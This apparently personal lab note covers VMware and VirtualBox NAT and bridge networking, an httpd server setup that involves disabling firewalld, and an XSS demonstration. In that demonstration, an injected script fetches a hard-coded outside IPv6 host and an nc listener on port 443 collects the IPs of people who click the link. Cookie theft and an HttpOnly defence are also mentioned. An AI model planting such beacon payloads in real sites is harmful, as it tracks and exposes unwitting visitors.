VMware NAT/Bridge Configuration/Http Server

# VMware NAT/Bridge Configuration/Http Server [TOC] ## NAT ![](https://i.imgur.com/fuklh7Z.png) ### Vmware 本地會產生一張 virtual 的 Interface ens33 跟 VMnet 8 - 會在同個LAN下 ``` 乙太網路卡 VMware Network Adapter VMnet8: 連線特定 DNS 尾碼 . . . . . . . . : 連結-本機 IPv6 位址 . . . . . . . : fe80::2447:1e2e:817e:4646%11 IPv4 位址 . . . . . . . . . . . . : 192.168.203.1 子網路遮罩 . . . . . . . . . . . .: 255.255.255.0 預設閘道 . . . . . . . . . . . . .: ``` --- ``` ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.203.155 netmask 255.255.255.0 broadcast 192.168.203.255 inet6 fe80::bf95:3305:da02:c0c1 prefixlen 64 scopeid 0x20<link> ether 00:0c:29:a3:42:bb txqueuelen 1000 (Ethernet) RX packets 72 bytes 17096 (16.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 106 bytes 11834 (11.5 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ``` ### Virtual Box 會有兩張 Interface eth1 -> NAT eth2 2 -> Host only (for host 溝通) ![](https://hackmd.io/_uploads/BkyNHzXIn.png) --- ### NAT 特性能保護內網IP private IP -> public ip (SNAT) 外網是無法連到內部的 Private IP ![](https://hackmd.io/_uploads/SJBKZGm8n.png) ## Bridge 橋接到手機網路 (wifi-網段) VM 會跟手機 Wifi 同一個LAN 下 ### Configure (VMware) 要先知道自己windows 的 wifi 是哪張網卡 -> 共和中心去找 ![](https://i.imgur.com/VYQK0BN.png) 設定完後 Reboot它 ## http public server 架設 (bridge to 手機 public ipv6 network ) Shut down Firewall (default zone=public) 只開放 ssh port 可以連要把firewallD shut down 進行測試 ``` systemctl status firewalld //lookup systemctl stop firewalld //stop systemctl disable firewalld // 不會開機再啟動 ``` 防火牆狀態 ![](https://i.imgur.com/EwV8pAU.png) ### Install httpd Server ``` yum install httpd -y systemctl start httpd ``` 啟動服務後且能以 http 方式 Access web server ``` systemctl start httpd.service systemctl status httpd.service ``` ![](https://i.imgur.com/FzbNjj1.png) ### XSS Payload ``` <script> const ipAddress = "[2402:7500:a0f:b7b2:36e8:378a:669e:8e07]"; // 設定 IP 位置 const port = "443"; // 設定 Port 號碼 fetch(`http://${ipAddress}:${port}`) .then(response => { if (response.ok) { return response.text(); } throw new Error('Network response was not ok.'); }) .then(data => { console.log(data); // 顯示伺服器回應的資料 }) .catch(error => { console.error('There was a problem with the fetch operation:', error); }); </script> ``` 可用; 來串接js 程式 ``` const ipAddress = "[2402:7500:a0f:b7b2:36e8:378a:669e:8e07]"; const port = "443"; fetch(`http://${ipAddress}:${port}`).then(response => { if (response.ok) { return response.text(); } throw new Error('Network response was not ok.'); }).then(data => { console.log(data); }).catch(error => { console.error('There was a problem with the fetch operation:', error); }); ``` ![](https://i.imgur.com/KVtQVbI.png) ### 接收點擊本網站 fetch過來的連線資訊 ``` nc -lvnp 443 ``` ![](https://i.imgur.com/BwiPj6I.png) 透過這個方法我們就能收集其他人點擊連結 host IP ### Defense: HttpOnly 這方法可以用來竊取cookie 不過當web 有設定 HTTPOnly 會阻止 DOM 下 js 存取 document.cookie